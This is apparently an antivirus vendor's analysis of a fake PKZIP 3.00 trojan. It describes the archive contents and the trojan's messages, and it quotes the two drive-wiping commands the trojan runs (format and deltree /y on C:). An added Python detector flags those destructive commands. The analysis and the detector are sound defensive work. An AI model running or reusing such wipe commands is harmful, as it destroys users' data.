Trojan.Win32.PKZ300b

Class Trojan
Platform Win32
Description

Technical Details


The fake PKZIP 3.00 package is distributed as a self-extracting archive named
PKZ300B.EXE, 178981 bytes long.


The archive contains five files; after extraction they are:


filename      length   what is it?
--------      ------   -----------
PKZINST.EXE     5328   the actual trojan program
WHATSNEW.300    2417   WHATSNEW file from PKZIP 2.04c, with "2.04c" replaced by "3.0"
COMPRESS.000  124005   ARJ 2.41, plus extra bytes
COMPRESS.001  116260   ARJ 2.41
FILE_ID.DIZ      101   text file announcing the package as PKZIP 3.0b

Only one file is the trojan itself: PKZINST.EXE. It was written in
Turbo Pascal. When executed, it displays the message:

PKZIP (R) Install Utility Version 3.00b 4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.
Initializing, this may take a few minutes….

and executes two commands:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c: > NULL

Fortunately, the trojan's author lacked the necessary DOS knowledge, and the
first command simply stops at the FORMAT confirmation prompt:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?

This prompt can be aborted either by resetting the machine or with Ctrl-C/Ctrl-Break.
In both cases the trojan is terminated without any harm to the data. In the case of
Ctrl-C it just informs the user:

Thanks for waiting, moron. You shouldn’t have fucked with us.

and returns to DOS.


There is one more bug in the trojan: the redirection "> NULL" creates a file
named NULL in the current directory. To suppress the command output the author
would have had to write "> NUL", the name of the DOS null device.


It seems the trojan's author is learning DOS page by page in alphabetical order:
he knows how to use the commands starting with "D" and "F", but he still has not
reached "N" (NUL) in his DOS User's Guide.
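The two spawned commands and the "> NULL" mistake can be recognised mechanically when triaging a sample. The following Python is an added example, not part of the original description or of AVP: it scans a constructed byte blob standing in for the executable (containing only the strings quoted above, not the real PKZINST.EXE) for COMMAND.COM /C invocations, flags verbs that wipe a whole drive when given a bare drive letter, and checks whether the redirection target is the NUL device or an ordinary file name.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed stand-in for the trojan's executable image: only the strings the
# description quotes, padded with filler bytes. This is NOT the real PKZINST.EXE.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"PKZIP (R) Install Utility Version 3.00b\x00"
    + b"COMMAND.COM /C Format c: > NULL\x00"
    + b"\xff" * 8
    + b"COMMAND.COM /C deltree /y c: > NULL\x00"
    + b"Thanks for waiting, moron.\x00"
)

# Verbs that destroy an entire drive when their argument is a bare drive letter.
DESTRUCTIVE = {"format", "deltree"}
# A COMMAND.COM /C <command line> string, terminated by NUL or a line break.
CMD_RE = re.compile(rb"COMMAND\.COM\s+/C\s+([^\x00\r\n]+)", re.IGNORECASE)

@dataclass
class SpawnedCommand:
    raw: str
    verb: str
    drive: Optional[str]
    redirect: Optional[str]
    destructive: bool
    redirect_is_nul_device: Optional[bool]

def is_nul_device(target: str) -> bool:
    # DOS matches device names on the base name, so NUL and NUL.TXT are the
    # null device, while NULL is an ordinary file name.
    return target.split(".")[0].upper() == "NUL"

def extract_spawned_commands(image: bytes) -> List[SpawnedCommand]:
    found = []
    for m in CMD_RE.finditer(image):
        raw = m.group(1).decode("ascii", errors="replace").strip()
        cmdpart, _, redirect = raw.partition(">")
        redirect = redirect.strip() or None
        tokens = cmdpart.split()
        verb = tokens[0].lower() if tokens else ""
        drive = next((t for t in tokens[1:] if re.fullmatch(r"[A-Za-z]:", t)), None)
        found.append(SpawnedCommand(
            raw=raw, verb=verb, drive=drive, redirect=redirect,
            destructive=verb in DESTRUCTIVE and drive is not None,
            redirect_is_nul_device=is_nul_device(redirect) if redirect else None,
        ))
    return found
```

Against the constructed image both commands come back as destructive, and both redirections resolve to a file named NULL rather than the device.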


AVP detects this trojan under the name "Trojan.PKZ300b", both in the extracted
executable file and in the self-extracting archive.